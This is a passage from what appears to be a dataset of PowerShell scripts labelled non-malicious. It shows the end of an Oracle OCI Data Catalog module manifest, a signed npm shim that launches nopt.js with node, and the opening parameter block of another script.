'Update-OCIDatacatalogDataAsset', 'Update-OCIDatacatalogEntity',
'Update-OCIDatacatalogFolder', 'Update-OCIDatacatalogGlossary',
'Update-OCIDatacatalogJob', 'Update-OCIDatacatalogJobDefinition',
'Update-OCIDatacatalogMetastore', 'Update-OCIDatacatalogNamespace',
'Update-OCIDatacatalogPattern', 'Update-OCIDatacatalogTerm',
'Update-OCIDatacatalogTermRelationship',
'Write-OCIDatacatalogCredentials'
# Variables to export from this module
VariablesToExport = '*'
# Aliases to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no aliases to export.
AliasesToExport = '*'
# DSC resources to export from this module
# DscResourcesToExport = @()
# List of all modules packaged with this module
# ModuleList = @()
# List of all files packaged with this module
# FileList = @()
# Private data to pass to the module specified in RootModule/ModuleToProcess. This may also contain a PSData hashtable with additional module metadata used by PowerShell.
PrivateData = @{
PSData = @{
# Tags applied to this module. These help with module discovery in online galleries.
Tags = 'PSEdition_Core','Windows','Linux','macOS','Oracle','OCI','Cloud','OracleCloudInfrastructure','Datacatalog'
# A URL to the license for this module.
LicenseUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/LICENSE.txt'
# A URL to the main website for this project.
ProjectUri = 'https://github.com/oracle/oci-powershell-modules/'
# A URL to an icon representing this module.
IconUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/icon.png'
# ReleaseNotes of this module
ReleaseNotes = 'https://github.com/oracle/oci-powershell-modules/blob/master/CHANGELOG.md'
# Prerelease string of this module
# Prerelease = ''
# Flag to indicate whether the module requires explicit user acceptance for install/update/save
# RequireLicenseAcceptance = $false
# External dependent modules of this module
# ExternalModuleDependencies = @()
} # End of PSData hashtable
} # End of PrivateData hashtable
# HelpInfo URI of this module
# HelpInfoURI = ''
# Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix.
# DefaultCommandPrefix = ''
}
|
combined_dataset/train/non-malicious/sample_65_79.ps1
|
sample_65_79.ps1
|
#!/usr/bin/env pwsh
$basedir=Split-Path $MyInvocation.MyCommand.Definition -Parent
$exe=""
if ($PSVersionTable.PSVersion -lt "6.0" -or $IsWindows) {
# Fix case when both the Windows and Linux builds of Node
# are installed in the same directory
$exe=".exe"
}
$ret=0
if (Test-Path "$basedir/node$exe") {
# Support pipeline input
if ($MyInvocation.ExpectingInput) {
$input | & "$basedir/node$exe" "$basedir/../nopt/bin/nopt.js" $args
} else {
& "$basedir/node$exe" "$basedir/../nopt/bin/nopt.js" $args
}
$ret=$LASTEXITCODE
} else {
# Support pipeline input
if ($MyInvocation.ExpectingInput) {
$input | & "node$exe" "$basedir/../nopt/bin/nopt.js" $args
} else {
& "node$exe" "$basedir/../nopt/bin/nopt.js" $args
}
$ret=$LASTEXITCODE
}
exit $ret
# SIG # Begin signature block
# MIIn4wYJKoZIhvcNAQcCoIIn1DCCJ9ACAQExDzANBglghkgBZQMEAgEFADB5Bgor
# BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG
# KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCBu4XtclZIHuZvw
# wEtJzBo+GhkuIuTbKIyKXeLmGuqFnKCCDZowggYYMIIEAKADAgECAhMzAAADgxRi
# cQvfm6Y9AAAAAAODMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD
# VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy
# b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p
# bmcgUENBIDIwMTEwHhcNMjMwNzEzMjM0NTM2WhcNMjQwOTE1MjM0NTM2WjCBiDEL
# MAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1v
# bmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEyMDAGA1UEAxMpTWlj
# cm9zb2Z0IDNyZCBQYXJ0eSBBcHBsaWNhdGlvbiBDb21wb25lbnQwggEiMA0GCSqG
# SIb3DQEBAQUAA4IBDwAwggEKAoIBAQCVnpFfGLqyxBtSgu7CxSDwvPHlzZQHSRzp
# ojCo8uAVAAd3wW6OzZ47snNdXEDXKLOpapzL/s5DQHK3M+gzT8OizgwIK3xWh+bj
# UnuqgmUjW9G3dEfT6fV50WkqL5ds50OqpkE+PH98EsVrgcvlQPe7xp0U6bP9i4KA
# ey/yrmjLOC2If1xFqZxQQGV1h5vWPOiCJKS2oZ447psFUKrRjak4JIQ6kCpEdla5
# GhmsGdH0PFv7nh+oW4z05odAC3Tbk88CnDgbbJZJ6uyz1MQ5Untgn0XdCeQEbBsc
# ipETD7NRC10Qj2QBqLo2IPxT21L/dC59nPsMjY+fDemfBA4pFQ6TAgMBAAGjggGC
# MIIBfjAfBgNVHSUEGDAWBgorBgEEAYI3TBEBBggrBgEFBQcDAzAdBgNVHQ4EFgQU
# tuoiUpjIEWGVH5RshyUbdVvfXHQwVAYDVR0RBE0wS6RJMEcxLTArBgNVBAsTJE1p
# Y3Jvc29mdCBJcmVsYW5kIE9wZXJhdGlvbnMgTGltaXRlZDEWMBQGA1UEBRMNMjMx
# NTIyKzUwMTE1NzAfBgNVHSMEGDAWgBRIbmTlUAXTgqoXNzcitW2oynUClTBUBgNV
# HR8ETTBLMEmgR6BFhkNodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20vcGtpb3BzL2Ny
# bC9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3JsMGEGCCsGAQUFBwEBBFUw
# UzBRBggrBgEFBQcwAoZFaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9j
# ZXJ0cy9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3J0MAwGA1UdEwEB/wQC
# MAAwDQYJKoZIhvcNAQELBQADggIBAIm7jWfeie51+VZ/l2C5mKnOQdnQmUAONVh7
# vziYlflUmase8NtFuuFPMphtwtubH6tZMRlGHDmPDtA4vX6M0Iw4BjoHSg/skFoK
# EeIAHlOmyE0RB43mTuNOvdwa0JSPWO5e6e1D0Byinam4vrK7GKaL41HcYwBi5b8N
# vGlAz5t6v41QQYf8e5CvX1/51uQIb4G0WhVeX6iMVss0MciV62eKhyGPUXlGld0x
# clJZV4koo1sG4ZruWf5PVelQxQ0b5QQcqZTlbVBb0espboVaxh5B9/og0YtD20V/
# eW+e+6RV0mOWPK+v86ZC+XVpSVKEwjFzWSh4hsySaoHdDYBIqLFfXA6fGHzQVw1G
# 1x++WxJ8yFD23wFN9pCU4cBJMHiu7/1sodNCww332I2PkU/0z8YLYtEuIDDbMBxq
# SamPwsh3MG7ekT7lldE5pYUgZyCVLfk6gRu3UzTqBBpOb9rY1JTkoGScBolCAJHS
# V1eZO3CgVFZtwBfaFTN/0rbFKE2MpmKcke9A9Hc78xTbfIuHPAo9AiTLTz6ELwUl
# aBPxcbIA+vUnR/euCP7OTzhIHjbwC73kEJkOusSWTVxan8/cpLfZDZ9VShMYT+++
# /lq+tzX5RB+3WSNjgVMNQvw/Bq1WKVxLvnkYkpWGN0U4YTv4fsjqpSAK2FS8ZMcG
# C4xMTj2qMIIHejCCBWKgAwIBAgIKYQ6Q0gAAAAAAAzANBgkqhkiG9w0BAQsFADCB
# iDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1Jl
# ZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEyMDAGA1UEAxMp
# TWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5IDIwMTEwHhcNMTEw
# NzA4MjA1OTA5WhcNMjYwNzA4MjEwOTA5WjB+MQswCQYDVQQGEwJVUzETMBEGA1UE
# CBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9z
# b2Z0IENvcnBvcmF0aW9uMSgwJgYDVQQDEx9NaWNyb3NvZnQgQ29kZSBTaWduaW5n
# IFBDQSAyMDExMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAq/D6chAc
# Lq3YbqqCEE00uvK2WCGfQhsqa+laUKq4BjgaBEm6f8MMHt03a8YS2AvwOMKZBrDI
# OdUBFDFC04kNeWSHfpRgJGyvnkmc6Whe0t+bU7IKLMOv2akrrnoJr9eWWcpgGgXp
# ZnboMlImEi/nqwhQz7NEt13YxC4Ddato88tt8zpcoRb0RrrgOGSsbmQ1eKagYw8t
# 00CT+OPeBw3VXHmlSSnnDb6gE3e+lD3v++MrWhAfTVYoonpy4BI6t0le2O3tQ5GD
# 2Xuye4Yb2T6xjF3oiU+EGvKhL1nkkDstrjNYxbc+/jLTswM9sbKvkjh+0p2ALPVO
# VpEhNSXDOW5kf1O6nA+tGSOEy/S6A4aN91/w0FK/jJSHvMAhdCVfGCi2zCcoOCWY
# OUo2z3yxkq4cI6epZuxhH2rhKEmdX4jiJV3TIUs+UsS1Vz8kA/DRelsv1SPjcF0P
# UUZ3s/gA4bysAoJf28AVs70b1FVL5zmhD+kjSbwYuER8ReTBw3J64HLnJN+/RpnF
# 78IcV9uDjexNSTCnq47f7Fufr/zdsGbiwZeBe+3W7UvnSSmnEyimp31ngOaKYnhf
# si+E11ecXL93KCjx7W3DKI8sj0A3T8HhhUSJxAlMxdSlQy90lfdu+HggWCwTXWCV
# mj5PM4TasIgX3p5O9JawvEagbJjS4NaIjAsCAwEAAaOCAe0wggHpMBAGCSsGAQQB
# gjcVAQQDAgEAMB0GA1UdDgQWBBRIbmTlUAXTgqoXNzcitW2oynUClTAZBgkrBgEE
# AYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMCAYYwDwYDVR0TAQH/BAUwAwEB
# /zAfBgNVHSMEGDAWgBRyLToCMZBDuRQFTuHqp8cx0SOJNDBaBgNVHR8EUzBRME+g
# TaBLhklodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20vcGtpL2NybC9wcm9kdWN0cy9N
# aWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3JsMF4GCCsGAQUFBwEBBFIwUDBO
# BggrBgEFBQcwAoZCaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraS9jZXJ0cy9N
# aWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3J0MIGfBgNVHSAEgZcwgZQwgZEG
# CSsGAQQBgjcuAzCBgzA/BggrBgEFBQcCARYzaHR0cDovL3d3dy5taWNyb3NvZnQu
# Y29tL3BraW9wcy9kb2NzL3ByaW1hcnljcHMuaHRtMEAGCCsGAQUFBwICMDQeMiAd
# AEwAZQBnAGEAbABfAHAAbwBsAGkAYwB5AF8AcwB0AGEAdABlAG0AZQBuAHQALiAd
# MA0GCSqGSIb3DQEBCwUAA4ICAQBn8oalmOBUeRou09h0ZyKbC5YR4WOSmUKWfdJ5
# DJDBZV8uLD74w3LRbYP+vj/oCso7v0epo/Np22O/IjWll11lhJB9i0ZQVdgMknzS
# Gksc8zxCi1LQsP1r4z4HLimb5j0bpdS1HXeUOeLpZMlEPXh6I/MTfaaQdION9Msm
# AkYqwooQu6SpBQyb7Wj6aC6VoCo/KmtYSWMfCWluWpiW5IP0wI/zRive/DvQvTXv
# biWu5a8n7dDd8w6vmSiXmE0OPQvyCInWH8MyGOLwxS3OW560STkKxgrCxq2u5bLZ
# 2xWIUUVYODJxJxp/sfQn+N4sOiBpmLJZiWhub6e3dMNABQamASooPoI/E01mC8Cz
# TfXhj38cbxV9Rad25UAqZaPDXVJihsMdYzaXht/a8/jyFqGaJ+HNpZfQ7l1jQeNb
# B5yHPgZ3BtEGsXUfFL5hYbXw3MYbBL7fQccOKO7eZS/sl/ahXJbYANahRr1Z85el
# CUtIEJmAH9AAKcWxm6U/RXceNcbSoqKfenoi+kiVH6v7RyOA9Z74v2u3S5fi63V4
# GuzqN5l5GEv/1rMjaHXmr/r8i+sLgOppO6/8MO0ETI7f33VtY5E90Z1WTk+/gFci
# oXgRMiF670EKsT/7qMykXcGhiJtXcVZOSEXAQsmbdlsKgEhr/Xmfwb1tbWrJUnMT
# DXpQzTGCGZ8wghmbAgEBMIGVMH4xCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNo
# aW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29y
# cG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25pbmcgUENBIDIw
# MTECEzMAAAODFGJxC9+bpj0AAAAAA4MwDQYJYIZIAWUDBAIBBQCgga4wGQYJKoZI
# hvcNAQkDMQwGCisGAQQBgjcCAQQwHAYKKwYBBAGCNwIBCzEOMAwGCisGAQQBgjcC
# ARUwLwYJKoZIhvcNAQkEMSIEIEOLfNS6KQ5yVVaXxTx1VWL3oqbs7wRnKlXHe/xo
# C6tzMEIGCisGAQQBgjcCAQwxNDAyoBSAEgBNAGkAYwByAG8AcwBvAGYAdKEagBho
# dHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20wDQYJKoZIhvcNAQEBBQAEggEANZalJlX6
# ce0n2GVs3SSsSAu39W6TZ07ihjeUMsCsq9xvUHuywq19dXb3SxE2dKO8N4dNEDrS
# lafSWmm40iEuDKMjP4Ln9AKV8cVB8uoNExvI00tpj66doKKcjfRV3rV/sKsLkQ7J
# ukhq7G2gUn+HlxWkw1LxY5SnayruVFbAxn3flojMHX8SO8AIon/1u0OvJ4C7XdVm
# mGeYpcVtHx9n4tRQxTmg6yq5L+g7UNcQ0/h9rq8kGPsyVzW96WdHcfG+KDFJ9wyk
# UG7BOKA5a40ftgTXVKctLJdn02c2vrHYK+J/Q9ZfJEubQt5M6G7tiBGZpeszSdD/
# Z2WuFKNw5zQp46GCFykwghclBgorBgEEAYI3AwMBMYIXFTCCFxEGCSqGSIb3DQEH
# AqCCFwIwghb+AgEDMQ8wDQYJYIZIAWUDBAIBBQAwggFZBgsqhkiG9w0BCRABBKCC
# AUgEggFEMIIBQAIBAQYKKwYBBAGEWQoDATAxMA0GCWCGSAFlAwQCAQUABCCDIKsT
# sLD7NziLmz39BUQusC6EA5txkYH6qezaeZ5ukwIGZk4BkCxDGBMyMDI0MDUyNDIx
# MjMxOC44NDlaMASAAgH0oIHYpIHVMIHSMQswCQYDVQQGEwJVUzETMBEGA1UECBMK
# V2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0
# IENvcnBvcmF0aW9uMS0wKwYDVQQLEyRNaWNyb3NvZnQgSXJlbGFuZCBPcGVyYXRp
# b25zIExpbWl0ZWQxJjAkBgNVBAsTHVRoYWxlcyBUU1MgRVNOOkZDNDEtNEJENC1E
# MjIwMSUwIwYDVQQDExxNaWNyb3NvZnQgVGltZS1TdGFtcCBTZXJ2aWNloIIReDCC
# BycwggUPoAMCAQICEzMAAAHimZmV8dzjIOsAAQAAAeIwDQYJKoZIhvcNAQELBQAw
# fDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1Jl
# ZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMd
# TWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIwMTAwHhcNMjMxMDEyMTkwNzI1WhcN
# MjUwMTEwMTkwNzI1WjCB0jELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0
# b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3Jh
# dGlvbjEtMCsGA1UECxMkTWljcm9zb2Z0IElyZWxhbmQgT3BlcmF0aW9ucyBMaW1p
# dGVkMSYwJAYDVQQLEx1UaGFsZXMgVFNTIEVTTjpGQzQxLTRCRDQtRDIyMDElMCMG
# A1UEAxMcTWljcm9zb2Z0IFRpbWUtU3RhbXAgU2VydmljZTCCAiIwDQYJKoZIhvcN
# AQEBBQADggIPADCCAgoCggIBALVjtZhV+kFmb8cKQpg2mzisDlRI978Gb2amGvbA
# mCd04JVGeTe/QGzM8KbQrMDol7DC7jS03JkcrPsWi9WpVwsIckRQ8AkX1idBG9Hh
# yCspAavfuvz55khl7brPQx7H99UJbsE3wMmpmJasPWpgF05zZlvpWQDULDcIYyl5
# lXI4HVZ5N6MSxWO8zwWr4r9xkMmUXs7ICxDJr5a39SSePAJRIyznaIc0WzZ6MFcT
# RzLLNyPBE4KrVv1LFd96FNxAzwnetSePg88EmRezr2T3HTFElneJXyQYd6YQ7eCI
# c7yllWoY03CEg9ghorp9qUKcBUfFcS4XElf3GSERnlzJsK7s/ZGPU4daHT2jWGoY
# ha2QCOmkgjOmBFCqQFFwFmsPrZj4eQszYxq4c4HqPnUu4hT4aqpvUZ3qIOXbdyU4
# 2pNL93cn0rPTTleOUsOQbgvlRdthFCBepxfb6nbsp3fcZaPBfTbtXVa8nLQuMCBq
# yfsebuqnbwj+lHQfqKpivpyd7KCWACoj78XUwYqy1HyYnStTme4T9vK6u2O/KThf
# ROeJHiSg44ymFj+34IcFEhPogaKvNNsTVm4QbqphCyknrwByqorBCLH6bllRtJMJ
# wmu7GRdTQsIx2HMKqphEtpSm1z3ufASdPrgPhsQIRFkHZGuihL1Jjj4Lu3CbAmha
# 0lOrAgMBAAGjggFJMIIBRTAdBgNVHQ4EFgQURIQOEdq+7QdslptJiCRNpXgJ2gUw
# HwYDVR0jBBgwFoAUn6cVXQBeYl2D9OXSZacbUzUZ6XIwXwYDVR0fBFgwVjBUoFKg
# UIZOaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9jcmwvTWljcm9zb2Z0
# JTIwVGltZS1TdGFtcCUyMFBDQSUyMDIwMTAoMSkuY3JsMGwGCCsGAQUFBwEBBGAw
# XjBcBggrBgEFBQcwAoZQaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9j
# ZXJ0cy9NaWNyb3NvZnQlMjBUaW1lLVN0YW1wJTIwUENBJTIwMjAxMCgxKS5jcnQw
# DAYDVR0TAQH/BAIwADAWBgNVHSUBAf8EDDAKBggrBgEFBQcDCDAOBgNVHQ8BAf8E
# BAMCB4AwDQYJKoZIhvcNAQELBQADggIBAORURDGrVRTbnulfsg2cTsyyh7YXvhVU
# 7NZMkITAQYsFEPVgvSviCylr5ap3ka76Yz0t/6lxuczI6w7tXq8n4WxUUgcj5wAh
# nNorhnD8ljYqbck37fggYK3+wEwLhP1PGC5tvXK0xYomU1nU+lXOy9ZRnShI/HZd
# Frw2srgtsbWow9OMuADS5lg7okrXa2daCOGnxuaD1IO+65E7qv2O0W0sGj7AWdOj
# NdpexPrspL2KEcOMeJVmkk/O0ganhFzzHAnWjtNWneU11WQ6Bxv8OpN1fY9wzQoi
# ycgvOOJM93od55EGeXxfF8bofLVlUE3zIikoSed+8s61NDP+x9RMya2mwK/Ys1xd
# vDlZTHndIKssfmu3vu/a+BFf2uIoycVTvBQpv/drRJD68eo401mkCRFkmy/+BmQl
# Rrx2rapqAu5k0Nev+iUdBUKmX/iOaKZ75vuQg7hCiBA5xIm5ZIXDSlX47wwFar3/
# BgTwntMq9ra6QRAeS/o/uYWkmvqvE8Aq38QmKgTiBnWSS/uVPcaHEyArnyFh5G+q
# eCGmL44MfEnFEhxc3saPmXhe6MhSgCIGJUZDA7336nQD8fn4y6534Lel+LuT5F5b
# Ft0mLwd+H5GxGzObZmm/c3pEWtHv1ug7dS/Dfrcd1sn2E4gk4W1L1jdRBbK9xwkM
# mwY+CHZeMSvBMIIHcTCCBVmgAwIBAgITMwAAABXF52ueAptJmQAAAAAAFTANBgkq
# hkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x
# EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv
# bjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5
# IDIwMTAwHhcNMjEwOTMwMTgyMjI1WhcNMzAwOTMwMTgzMjI1WjB8MQswCQYDVQQG
# EwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwG
# A1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQDEx1NaWNyb3NvZnQg
# VGltZS1TdGFtcCBQQ0EgMjAxMDCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoC
# ggIBAOThpkzntHIhC3miy9ckeb0O1YLT/e6cBwfSqWxOdcjKNVf2AX9sSuDivbk+
# F2Az/1xPx2b3lVNxWuJ+Slr+uDZnhUYjDLWNE893MsAQGOhgfWpSg0S3po5GawcU
# 88V29YZQ3MFEyHFcUTE3oAo4bo3t1w/YJlN8OWECesSq/XJprx2rrPY2vjUmZNqY
# O7oaezOtgFt+jBAcnVL+tuhiJdxqD89d9P6OU8/W7IVWTe/dvI2k45GPsjksUZzp
# cGkNyjYtcI4xyDUoveO0hyTD4MmPfrVUj9z6BVWYbWg7mka97aSueik3rMvrg0Xn
# Rm7KMtXAhjBcTyziYrLNueKNiOSWrAFKu75xqRdbZ2De+JKRHh09/SDPc31BmkZ1
# zcRfNN0Sidb9pSB9fvzZnkXftnIv231fgLrbqn427DZM9ituqBJR6L8FA6PRc6ZN
# N3SUHDSCD/AQ8rdHGO2n6Jl8P0zbr17C89XYcz1DTsEzOUyOArxCaC4Q6oRRRuLR
# vWoYWmEBc8pnol7XKHYC4jMYctenIPDC+hIK12NvDMk2ZItboKaDIV1fMHSRlJTY
# uVD5C4lh8zYGNRiER9vcG9H9stQcxWv2XFJRXRLbJbqvUAV6bMURHXLvjflSxIUX
# k8A8FdsaN8cIFRg/eKtFtvUeh17aj54WcmnGrnu3tz5q4i6tAgMBAAGjggHdMIIB
# 2TASBgkrBgEEAYI3FQEEBQIDAQABMCMGCSsGAQQBgjcVAgQWBBQqp1L+ZMSavoKR
# PEY1Kc8Q/y8E7jAdBgNVHQ4EFgQUn6cVXQBeYl2D9OXSZacbUzUZ6XIwXAYDVR0g
# BFUwUzBRBgwrBgEEAYI3TIN9AQEwQTA/BggrBgEFBQcCARYzaHR0cDovL3d3dy5t
# aWNyb3NvZnQuY29tL3BraW9wcy9Eb2NzL1JlcG9zaXRvcnkuaHRtMBMGA1UdJQQM
# MAoGCCsGAQUFBwMIMBkGCSsGAQQBgjcUAgQMHgoAUwB1AGIAQwBBMAsGA1UdDwQE
# AwIBhjAPBgNVHRMBAf8EBTADAQH/MB8GA1UdIwQYMBaAFNX2VsuP6KJcYmjRPZSQ
# W9fOmhjEMFYGA1UdHwRPME0wS6BJoEeGRWh0dHA6Ly9jcmwubWljcm9zb2Z0LmNv
# bS9wa2kvY3JsL3Byb2R1Y3RzL01pY1Jvb0NlckF1dF8yMDEwLTA2LTIzLmNybDBa
# BggrBgEFBQcBAQROMEwwSgYIKwYBBQUHMAKGPmh0dHA6Ly93d3cubWljcm9zb2Z0
# LmNvbS9wa2kvY2VydHMvTWljUm9vQ2VyQXV0XzIwMTAtMDYtMjMuY3J0MA0GCSqG
# SIb3DQEBCwUAA4ICAQCdVX38Kq3hLB9nATEkW+Geckv8qW/qXBS2Pk5HZHixBpOX
# PTEztTnXwnE2P9pkbHzQdTltuw8x5MKP+2zRoZQYIu7pZmc6U03dmLq2HnjYNi6c
# qYJWAAOwBb6J6Gngugnue99qb74py27YP0h1AdkY3m2CDPVtI1TkeFN1JFe53Z/z
# jj3G82jfZfakVqr3lbYoVSfQJL1AoL8ZthISEV09J+BAljis9/kpicO8F7BUhUKz
# /AyeixmJ5/ALaoHCgRlCGVJ1ijbCHcNhcy4sa3tuPywJeBTpkbKpW99Jo3QMvOyR
# gNI95ko+ZjtPu4b6MhrZlvSP9pEB9s7GdP32THJvEKt1MMU0sHrYUP4KWN1APMdU
# bZ1jdEgssU5HLcEUBHG/ZPkkvnNtyo4JvbMBV0lUZNlz138eW0QBjloZkWsNn6Qo
# 3GcZKCS6OEuabvshVGtqRRFHqfG3rsjoiV5PndLQTHa1V1QJsWkBRH58oWFsc/4K
# u+xBZj1p/cvBQUl+fpO+y/g75LcVv7TOPqUxUYS8vwLBgqJ7Fx0ViY1w/ue10Cga
# iQuPNtq6TPmb/wrpNPgkNWcr4A245oyZ1uEi6vAnQj0llOZ0dFtq0Z4+7X6gMTN9
# vMvpe784cETRkPHIqzqKOghif9lwY1NNje6CbaUFEMFxBmoQtB1VM1izoXBm8qGC
# AtQwggI9AgEBMIIBAKGB2KSB1TCB0jELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldh
# c2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBD
# b3Jwb3JhdGlvbjEtMCsGA1UECxMkTWljcm9zb2Z0IElyZWxhbmQgT3BlcmF0aW9u
# cyBMaW1pdGVkMSYwJAYDVQQLEx1UaGFsZXMgVFNTIEVTTjpGQzQxLTRCRDQtRDIy
# MDElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUtU3RhbXAgU2VydmljZaIjCgEBMAcG
# BSsOAwIaAxUAFpuZafp0bnpJdIhfiB1d8pTohm+ggYMwgYCkfjB8MQswCQYDVQQG
# EwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwG
# A1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQDEx1NaWNyb3NvZnQg
# VGltZS1TdGFtcCBQQ0EgMjAxMDANBgkqhkiG9w0BAQUFAAIFAOn7ItQwIhgPMjAy
# NDA1MjQyMjI5NDBaGA8yMDI0MDUyNTIyMjk0MFowdDA6BgorBgEEAYRZCgQBMSww
# KjAKAgUA6fsi1AIBADAHAgEAAgIPXDAHAgEAAgIRkjAKAgUA6fx0VAIBADA2Bgor
# BgEEAYRZCgQCMSgwJjAMBgorBgEEAYRZCgMCoAowCAIBAAIDB6EgoQowCAIBAAID
# AYagMA0GCSqGSIb3DQEBBQUAA4GBAJjit+yOEKVmLoDG3qb5HYzLYv6bYqVz1ueK
# kCHo56r2Q0THicE5YmbiWa8tIG55LKnCyaNlhaIYXDdgW4v5ZpF6vLMjI9T41f/R
# c/2XUpi5RyJSPKsSZZOOE45yAVjcBr6O645pBMN+EsSq1SOrSHNVmu8KchIATWM1
# U4Y4IeU6MYIEDTCCBAkCAQEwgZMwfDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldh
# c2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBD
# b3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIw
# MTACEzMAAAHimZmV8dzjIOsAAQAAAeIwDQYJYIZIAWUDBAIBBQCgggFKMBoGCSqG
# SIb3DQEJAzENBgsqhkiG9w0BCRABBDAvBgkqhkiG9w0BCQQxIgQg/MXdXdpQ27r2
# pwrcDeIxMz4+ZX3WAs6C64nBVvWHJvcwgfoGCyqGSIb3DQEJEAIvMYHqMIHnMIHk
# MIG9BCAriSpKEP0muMbBUETODoL4d5LU6I/bjucIZkOJCI9//zCBmDCBgKR+MHwx
# CzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRt
# b25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xJjAkBgNVBAMTHU1p
# Y3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwAhMzAAAB4pmZlfHc4yDrAAEAAAHi
# MCIEIEJWYpxbClD6jimTfKKPaviJByIYX+ekqIpcyDw7BBmKMA0GCSqGSIb3DQEB
# CwUABIICAFPsVQ7IXOgc3X8vekzcpKWXHA5zCFoLzeOsKrYK28k0+XqIjwf/PjSt
# rpZ6GTnd/xNqRXPdgq2LOKMbs0k0ZMARbJFI2bkg3aHbOlj090X1oP4vQGbiWAqh
# XDpij8pK/lE48OPbIF6m77hdOwAoCwa4Cvg2jMn7DWO1irf7MdATN5QF8KX90SRL
# ldl4ZZ0S7aQOjY7A8iIOC2wC9b2eJHMLzdhAuy30jaXZHJCbCPqol74VTxg3aSbN
# e+WdkP9C8NeB16xflbpOeKHC7kMmrIAxRLcLwdvO2seRFiqDcbvXy/Dnur8Gx+Vx
# hRKq/U6R0An4JDpuM+XiPxRH++fSITe3lyncM09QtgXKe1Tlk1KddqaTXYKUa3Gh
# m/Meahz+uKj9/5ZA1KutZ8jr6Hx+hISLJ6m+JovwdvQ6BboK9jfthlYz/+IocTVR
# ilIgYXAv1/V0ucgOG3prki8ixtr2cVSYXmqUWsH2zG1iZXC6d+TXXrqSRz29SlQk
# 8ZW4JzoHYTWmLxKCd1SXkkWvFbVI+4vwdBrydx3VvFpvwhvnRHJH/adWxqplNZey
# ZWwL/ljuO2s8N3eWhOspOp1Q50OzbPDckdWLuf7Lwk4j+BGMcYQGlYtw5ziAXU2m
# pxX6oNcrScgI86OWZFBcTjiKskN1k0PKKsAeeOMIVTwOQeXGze9u
# SIG # End signature block
|
combined_dataset/train/non-malicious/2734.ps1
|
2734.ps1
|
[CmdletBinding()]
Param (
[Parameter(Mandatory=$false)]
[int32]$BackMins=180
)
